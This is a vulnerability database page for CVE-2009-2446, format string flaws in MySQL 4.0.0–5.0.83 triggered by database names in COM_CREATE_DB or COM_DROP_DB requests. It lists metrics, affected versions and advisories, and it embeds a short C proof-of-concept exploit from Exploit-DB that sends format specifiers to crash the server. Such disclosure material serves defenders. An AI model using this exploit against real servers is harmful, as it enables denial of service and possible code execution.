CVE-2009-2446 : Detail

CVE-2009-2446

17.39%V3
Network
2009-07-13
15h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple format string vulnerabilities in the dispatch_command function in libmysqld/sql_parse.cc in mysqld in MySQL 4.0.0 through 5.0.83 allow remote authenticated users to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in a database name in a (1) COM_CREATE_DB or (2) COM_DROP_DB request. NOTE: some of these details are obtained from third party information.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-134 Use of Externally-Controlled Format String
The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

Metrics

Metrics Score Severity CVSS Vector Source
V2 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 33077

Publication date : 2009-06-07 22h00 +00:00
Author : kingcope
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/35609/info MySQL is prone to multiple format-string vulnerabilities. Attackers can leverage these issues to execute arbitrary code within the context of the vulnerable application. Failed attacks will likely cause denial-of-service conditions. MySQL 4.0.0 through 5.0.75 are vulnerable; other versions may also be affected. #include <stdlib.h> #include <stdio.h> #define USE_OLD_FUNCTIONS #include <mysql/mysql.h> #define NullS (char *) 0 int main (int argc, char **argv) { MYSQL *mysql = NULL; mysql = mysql_init (mysql); if (!mysql) { puts ("Init faild, out of memory?"); return EXIT_FAILURE; } if (!mysql_real_connect (mysql, /* MYSQL structure to use */ "localhost", /* server hostname or IP address */ "monty", /* mysql user */ "montypython", /* password */ NULL, /* default database to use, NULL for none */ 0, /* port number, 0 for default */ NULL, /* socket file or named pipe name */ CLIENT_FOUND_ROWS /* connection flags */ )) { puts ("Connect failed\n"); } else { puts ("Connect OK\n"); // mysql_create_db(mysql, "%s%s%s%s%s"); simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0); } mysql_close (mysql); return EXIT_SUCCESS; }

Products Mentioned

Configuraton 0

Mysql>>Mysql >> Version 4.1.0

Mysql>>Mysql >> Version 4.1.2

Mysql>>Mysql >> Version 4.1.3

Mysql>>Mysql >> Version 4.1.8

Mysql>>Mysql >> Version 4.1.10

Mysql>>Mysql >> Version 4.1.12

Mysql>>Mysql >> Version 4.1.13

Mysql>>Mysql >> Version 4.1.14

Mysql>>Mysql >> Version 4.1.15

Mysql>>Mysql >> Version 4.1.23

    Mysql>>Mysql >> Version 5.0.0

    Mysql>>Mysql >> Version 5.0.1

    Mysql>>Mysql >> Version 5.0.2

    Mysql>>Mysql >> Version 5.0.3

    Mysql>>Mysql >> Version 5.0.4

    Mysql>>Mysql >> Version 5.0.5

    Mysql>>Mysql >> Version 5.0.5.0.21

      Mysql>>Mysql >> Version 5.0.10

      Mysql>>Mysql >> Version 5.0.15

      Mysql>>Mysql >> Version 5.0.16

      Mysql>>Mysql >> Version 5.0.17

      Mysql>>Mysql >> Version 5.0.20

      Mysql>>Mysql >> Version 5.0.22.1.0.1

        Mysql>>Mysql >> Version 5.0.24

        Mysql>>Mysql >> Version 5.0.30

        Mysql>>Mysql >> Version 5.0.36

        Mysql>>Mysql >> Version 5.0.44

        Mysql>>Mysql >> Version 5.0.54

        Mysql>>Mysql >> Version 5.0.56

        Mysql>>Mysql >> Version 5.0.60

        Mysql>>Mysql >> Version 5.0.66

        Mysql>>Mysql >> Version 5.0.82

        Oracle>>Mysql >> Version 4.0.0

        Oracle>>Mysql >> Version 4.0.1

        Oracle>>Mysql >> Version 4.0.2

        Oracle>>Mysql >> Version 4.0.3

        Oracle>>Mysql >> Version 4.0.4

        Oracle>>Mysql >> Version 4.0.5

        Oracle>>Mysql >> Version 4.0.5a

        Oracle>>Mysql >> Version 4.0.6

        Oracle>>Mysql >> Version 4.0.7

        Oracle>>Mysql >> Version 4.0.7

        Oracle>>Mysql >> Version 4.0.8

        Oracle>>Mysql >> Version 4.0.8

        Oracle>>Mysql >> Version 4.0.9

        Oracle>>Mysql >> Version 4.0.9

        Oracle>>Mysql >> Version 4.0.10

        Oracle>>Mysql >> Version 4.0.11

        Oracle>>Mysql >> Version 4.0.11

        Oracle>>Mysql >> Version 4.0.12

        Oracle>>Mysql >> Version 4.0.13

        Oracle>>Mysql >> Version 4.0.14

        Oracle>>Mysql >> Version 4.0.15

        Oracle>>Mysql >> Version 4.0.16

        Oracle>>Mysql >> Version 4.0.17

        Oracle>>Mysql >> Version 4.0.18

        Oracle>>Mysql >> Version 4.0.19

        Oracle>>Mysql >> Version 4.0.20

        Oracle>>Mysql >> Version 4.0.21

        Oracle>>Mysql >> Version 4.0.23

        Oracle>>Mysql >> Version 4.0.24

        Oracle>>Mysql >> Version 4.0.25

        Oracle>>Mysql >> Version 4.0.26

        Oracle>>Mysql >> Version 4.0.27

        Oracle>>Mysql >> Version 4.1.0

        Oracle>>Mysql >> Version 4.1.1

        Oracle>>Mysql >> Version 4.1.2

        Oracle>>Mysql >> Version 4.1.3

        Oracle>>Mysql >> Version 4.1.4

        Oracle>>Mysql >> Version 4.1.5

        Oracle>>Mysql >> Version 4.1.6

        Oracle>>Mysql >> Version 4.1.7

        Oracle>>Mysql >> Version 4.1.9

        Oracle>>Mysql >> Version 4.1.11

        Oracle>>Mysql >> Version 4.1.16

        Oracle>>Mysql >> Version 4.1.17

        Oracle>>Mysql >> Version 4.1.18

        Oracle>>Mysql >> Version 4.1.19

        Oracle>>Mysql >> Version 4.1.20

        Oracle>>Mysql >> Version 4.1.21

        Oracle>>Mysql >> Version 4.1.22

        Oracle>>Mysql >> Version 5.0.0

        Oracle>>Mysql >> Version 5.0.3

        Oracle>>Mysql >> Version 5.0.6

        Oracle>>Mysql >> Version 5.0.7

        Oracle>>Mysql >> Version 5.0.8

        Oracle>>Mysql >> Version 5.0.9

        Oracle>>Mysql >> Version 5.0.11

        Oracle>>Mysql >> Version 5.0.12

        Oracle>>Mysql >> Version 5.0.13

        Oracle>>Mysql >> Version 5.0.14

        Oracle>>Mysql >> Version 5.0.18

        Oracle>>Mysql >> Version 5.0.19

        Oracle>>Mysql >> Version 5.0.21

        Oracle>>Mysql >> Version 5.0.22

        Oracle>>Mysql >> Version 5.0.23

        Oracle>>Mysql >> Version 5.0.25

        Oracle>>Mysql >> Version 5.0.26

        Oracle>>Mysql >> Version 5.0.27

        Oracle>>Mysql >> Version 5.0.30

        Oracle>>Mysql >> Version 5.0.32

        Oracle>>Mysql >> Version 5.0.33

        Oracle>>Mysql >> Version 5.0.37

        Oracle>>Mysql >> Version 5.0.38

        Oracle>>Mysql >> Version 5.0.41

        Oracle>>Mysql >> Version 5.0.42

        Oracle>>Mysql >> Version 5.0.45

        Oracle>>Mysql >> Version 5.0.50

        Oracle>>Mysql >> Version 5.0.51

        Oracle>>Mysql >> Version 5.0.51a

        Oracle>>Mysql >> Version 5.0.52

        Oracle>>Mysql >> Version 5.0.75

        Oracle>>Mysql >> Version 5.0.77

        Oracle>>Mysql >> Version 5.0.81

        Oracle>>Mysql >> Version 5.0.83

        References

        http://www.ubuntu.com/usn/USN-1397-1
        Tags : vendor-advisory, x_refsource_UBUNTU
        http://secunia.com/advisories/38517
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://ubuntu.com/usn/usn-897-1
        Tags : vendor-advisory, x_refsource_UBUNTU
        http://www.redhat.com/support/errata/RHSA-2009-1289.html
        Tags : vendor-advisory, x_refsource_REDHAT
        http://securitytracker.com/id?1022533
        Tags : vdb-entry, x_refsource_SECTRACK
        http://www.osvdb.org/55734
        Tags : vdb-entry, x_refsource_OSVDB
        http://www.vupen.com/english/advisories/2009/1857
        Tags : vdb-entry, x_refsource_VUPEN
        http://support.apple.com/kb/HT4077
        Tags : x_refsource_CONFIRM
        http://www.mandriva.com/security/advisories?name=MDVSA-2009:179
        Tags : vendor-advisory, x_refsource_MANDRIVA
        http://www.securityfocus.com/bid/35609
        Tags : vdb-entry, x_refsource_BID
        http://www.redhat.com/support/errata/RHSA-2010-0110.html
        Tags : vendor-advisory, x_refsource_REDHAT
        http://secunia.com/advisories/35767
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://secunia.com/advisories/36566
        Tags : third-party-advisory, x_refsource_SECUNIA